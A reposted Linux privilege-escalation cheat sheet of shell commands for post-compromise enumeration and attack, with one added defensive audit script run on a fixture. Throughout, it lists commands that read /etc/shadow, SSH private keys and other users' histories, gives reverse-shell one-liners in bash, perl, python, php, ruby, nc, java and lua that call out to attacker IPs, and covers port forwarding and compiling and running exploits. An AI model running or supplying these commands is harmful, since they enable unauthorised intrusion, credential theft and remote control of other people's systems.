Reprint: http://www.myhack58.com/Article/html/3/8/2017/83236.htm
0x00 Operating system related
Operating system type and version
- cat /etc/issue
- cat /etc/*-release
- cat /etc/lsb-release # Debian
- cat /etc/redhat-release # Redhat
Kernel version, whether it is 64-bit
- cat /proc/version
- uname -a
- uname -mrs
- rpm -q kernel
- dmesg | grep Linux
- ls /boot | grep vmlinuz-
Environment variables
- cat /etc/profile
- cat /etc/bashrc
- cat ~/.bash_profile
- cat ~/.bashrc
- cat ~/.bash_logout
- env
- set
See if a printer is available
- lpstat -a
0x01 Applications and services related
View running processes and the user each one runs as
- ps aux
- ps -ef
- top
- cat /etc/services
Processes running with root privileges
- ps aux | grep root
- ps -ef | grep root
View installed applications
- ls -alh /usr/bin/
- ls -alh /sbin/
- dpkg -l
- rpm -qa
- ls -alh /var/cache/apt/archives
- ls -alh /var/cache/yum/
Configuration files for some services
- cat /etc/syslog.conf
- cat /etc/chttp.conf
- cat /etc/lighttpd.conf
- cat /etc/cups/cupsd.conf
- cat /etc/inetd.conf
- cat /etc/apache2/apache2.conf
- cat /etc/my.conf
- cat /etc/httpd/conf/httpd.conf
- cat /opt/lampp/etc/httpd.conf
- ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
Scheduled tasks
- crontab -l
- ls -alh /var/spool/cron
- ls -al /etc/ | grep cron
- ls -al /etc/cron*
- cat /etc/cron*
- cat /etc/at.allow
- cat /etc/at.deny
- cat /etc/cron.allow
- cat /etc/cron.deny
- cat /etc/crontab
- cat /etc/anacrontab
- cat /var/spool/cron/crontabs/root
Find stored plaintext user names and passwords
- grep -i user [filename]
- grep -i pass [filename]
- grep -C 5 "password" [filename]
- find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
0x02 Communication and network related
View current network addresses
- /sbin/ifconfig -a
- cat /etc/network/interfaces
- cat /etc/sysconfig/network
View network configuration: DNS, DHCP, gateways
- cat /etc/resolv.conf
- cat /etc/sysconfig/network
- cat /etc/networks
- iptables -L
- hostname
- dnsdomainname
View network connections and traffic
- lsof -i
- lsof -i :80
- grep 80 /etc/services
- netstat -antup
- netstat -antpx
- netstat -tulpn
- chkconfig --list
- chkconfig --list | grep 3:on
- last
- w
View ARP cache and routes
- arp -e
- route
- /sbin/route -nee
tcpdump
- tcpdump tcp dst 192.168.1.7 and tcp dst 10.2.2.222 21
tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Interactive shell
Bash version:
- bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl version:
- perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python version:
- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP version:
- php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby version:
- ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc version:
- nc -e /bin/sh 223.8.200.234 1234
nc without -e:
- mknod /tmp/backpipe p
- /bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
mknod
- mknod backpipe p && telnet 173.214.173.151 8080 0<backpipe | /bin/bash 1>backpipe
Java version:
- r = Runtime.getRuntime()
- p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/202.103.243.122/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
- p.waitFor()
Lua version:
- lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Port forwarding
lcx -<listen|tran|slave>
- lcx -listen 4567 33891 # on the attacker
- lcx -slave 111.222.333.444 4567 127.0.0.1 3389 # on the target
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
- ssh -L 8080:127.0.0.1:80 [username]@[ip] # local port
- ssh -R 8080:127.0.0.1:80 [username]@[ip] # remote port
mknod backpipe p; nc -l -p [remote port] < backpipe | nc [local ip] [local port] > backpipe
- mknod backpipe p; nc -l -p 8080 < backpipe | nc 10.1.1.251 > backpipe
- mknod backpipe p; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # proxy (port 8080)
- mknod backpipe p; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # proxy monitor (port 8080)
Tunnel
- ssh -D 127.0.0.1:9050 -N [username]@[ip]
- proxychains ifconfig
0x03 User related
User information
- id
- who
- w
- last
- cat /etc/passwd
- cat /etc/group
- cat /etc/shadow
- ls -alh /var/mail/
- grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 {print $1}' # list superusers
- awk -F: '($3 == "0") {print}' /etc/passwd # list superusers
- cat /etc/sudoers
- sudo -l
List home directories
- ls -ahlR /root/
- ls -ahlR /home/
Find passwords in configuration files
- cat /var/apache2/config.inc
- cat /var/lib/mysql/mysql/user.MYD
- cat /root/anaconda-ks.cfg
View other users' command history
- cat ~/.bash_history
- cat ~/.nano_history
- cat ~/.atftp_history
- cat ~/.mysql_history
- cat ~/.php_history
SSH keys and configuration
- cat ~/.ssh/authorized_keys
- cat ~/.ssh/identity.pub
- cat ~/.ssh/identity
- cat ~/.ssh/id_rsa.pub
- cat ~/.ssh/id_rsa
- cat ~/.ssh/id_dsa.pub
- cat ~/.ssh/id_dsa
- cat /etc/ssh/ssh_config
- cat /etc/ssh/sshd_config
- cat /etc/ssh/ssh_host_dsa_key.pub
- cat /etc/ssh/ssh_host_dsa_key
- cat /etc/ssh/ssh_host_rsa_key.pub
- cat /etc/ssh/ssh_host_rsa_key
- cat /etc/ssh/ssh_host_key.pub
- cat /etc/ssh/ssh_host_key
0x04 File system related
Files under /etc/
- ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # writable by anyone
- ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # writable by owner
- ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # writable by group
- ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # writable by other
- find /etc/ -readable -type f 2>/dev/null # readable by anyone
- find /etc/ -readable -type f -maxdepth 1 2>/dev/null # readable by anyone, top level only
Log files
- ls -alh /var/log
- ls -alh /var/mail
- ls -alh /var/spool
- ls -alh /var/spool/lpd
- ls -alh /var/lib/pgsql
- ls -alh /var/lib/mysql
- cat /var/lib/dhcp3/dhclient.leases
View web site files
- ls -alhR /var/www/
- ls -alhR /srv/www/htdocs/
- ls -alhR /usr/local/www/apache22/data/
- ls -alhR /opt/lampp/htdocs/
- ls -alhR /var/www/html/
Common log files
- cat /etc/httpd/logs/access_log
- cat /etc/httpd/logs/access.log
- cat /etc/httpd/logs/error_log
- cat /etc/httpd/logs/error.log
- cat /var/log/apache2/access_log
- cat /var/log/apache2/access.log
- cat /var/log/apache2/error_log
- cat /var/log/apache2/error.log
- cat /var/log/apache/access_log
- cat /var/log/apache/access.log
- cat /var/log/auth.log
- cat /var/log/chttp.log
- cat /var/log/cups/error_log
- cat /var/log/dpkg.log
- cat /var/log/faillog
- cat /var/log/httpd/access_log
- cat /var/log/httpd/access.log
- cat /var/log/httpd/error_log
- cat /var/log/httpd/error.log
- cat /var/log/lastlog
- cat /var/log/lighttpd/access.log
- cat /var/log/lighttpd/error.log
- cat /var/log/lighttpd/lighttpd.access.log
- cat /var/log/lighttpd/lighttpd.error.log
- cat /var/log/messages
- cat /var/log/secure
- cat /var/log/syslog
- cat /var/log/wtmp
- cat /var/log/xferlog
- cat /var/log/yum.log
- cat /var/run/utmp
- cat /var/webmin/miniserv.log
- cat /var/www/logs/access_log
- cat /var/www/logs/access.log
- ls -alh /var/lib/dhcp3/
- ls -alh /var/log/postgresql/
- ls -alh /var/log/proftpd/
- ls -alh /var/log/samba/
Mounted file systems
- mount
- df -h
- cat /etc/fstab
Find commands
- find / -perm -1000 -type d 2>/dev/null # sticky bit: only the owner of a file in the directory can delete or rename it
- find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000): runs as the group, not the user who started it
- find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000): runs as the owner, not the user who started it
- find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
- for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # look in /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other bin directory
- find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null # from /, find SGID or SUID files, exclude symbolic links, descend 3 directories deep, show a detailed listing and discard error messages
Find writable directories
- find / -writable -type d 2>/dev/null # writable directory
- find / -perm -222 -type d 2>/dev/null # writable directory
- find / -perm -o=w -type d 2>/dev/null # world-writable directory
- find / -perm -o=x -type d 2>/dev/null # world-executable directory
- find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null # world-writable and executable directory
Find files
- find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null # world-writable directories without the sticky bit
- find /dir -xdev \( -nouser -o -nogroup \) -print 2>/dev/null # files with no owner or group
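The superuser check from 0x03 and the SUID/SGID and world-writable checks above are the findings a hardening audit should flag, so here they are wrapped as functions and run against a constructed fixture tree. This is an added example, not part of the original cheat sheet; the fixture layout, the `toor` account and the file names are all hypothetical.

```shell
#!/bin/sh
# Added audit example, not part of the original cheat sheet: the UID-0,
# SUID/SGID and world-writable checks above wrapped as functions and run
# against a constructed fixture tree, so nothing on the real host is touched.

# Accounts with UID 0 in a passwd-format file (every one of them is root).
list_uid0_accounts() {
    grep -v -E '^#' "$1" | awk -F: '$3 == 0 { print $1 }'
}

# Directories writable by "other" without the sticky bit: any user can delete
# or replace files that other users placed there.
find_world_writable_no_sticky() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# Regular files with the setuid or setgid bit; diff the output against a
# known-good baseline of the distribution's packaged binaries.
find_setuid_setgid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Constructed fixture (hypothetical data): one finding of each kind plus
# one benign counterpart, so the checks can be verified offline.
make_fixture() {
    fixture_root=$(mktemp -d)
    mkdir -p "$fixture_root/tmp_ok" "$fixture_root/tmp_bad" "$fixture_root/bin"
    chmod 0755 "$fixture_root/bin"
    chmod 1777 "$fixture_root/tmp_ok"    # sticky bit set, as /tmp should be
    chmod 0777 "$fixture_root/tmp_bad"   # world-writable, no sticky bit
    printf 'exit 0\n' > "$fixture_root/bin/suidtool"
    chmod 4755 "$fixture_root/bin/suidtool"   # setuid bit set
    printf 'exit 0\n' > "$fixture_root/bin/plain"
    chmod 0755 "$fixture_root/bin/plain"      # ordinary binary
    printf '%s\n' '# constructed passwd file' \
        'root:x:0:0:root:/root:/bin/sh' \
        'alice:x:1000:1000::/home/alice:/bin/sh' \
        'toor:x:0:0:second uid 0 account:/:/bin/sh' > "$fixture_root/passwd"
    printf '%s\n' "$fixture_root"
}

# Demo run against the fixture; point the functions at / and /etc/passwd
# for a real audit.
demo_root=$(make_fixture)
echo "UID 0 accounts:";            list_uid0_accounts "$demo_root/passwd"
echo "World-writable, no sticky:"; find_world_writable_no_sticky "$demo_root"
echo "SUID/SGID files:";           find_setuid_setgid_files "$demo_root"
rm -rf "$demo_root"
```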
0x05 Preparation and attack
View language support
- find / -name perl*
- find / -name python*
- find / -name gcc*
- find / -name cc
View upload methods
- find / -name wget
- find / -name nc*
- find / -name netcat*
- find / -name tftp*
- find / -name ftp
Find exploits
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
Compiling an exploit
- which gcc
- gcc exp.c -o exp
Run
- chmod +x exp
- ./exp
0x06 Privilege escalation helper scripts
LinEnum
linuxprivchecker.py
The above is not exhaustive and may contain errors; corrections and additions are welcome. Let's learn and exchange ideas.
Common command set for Linux privilege escalation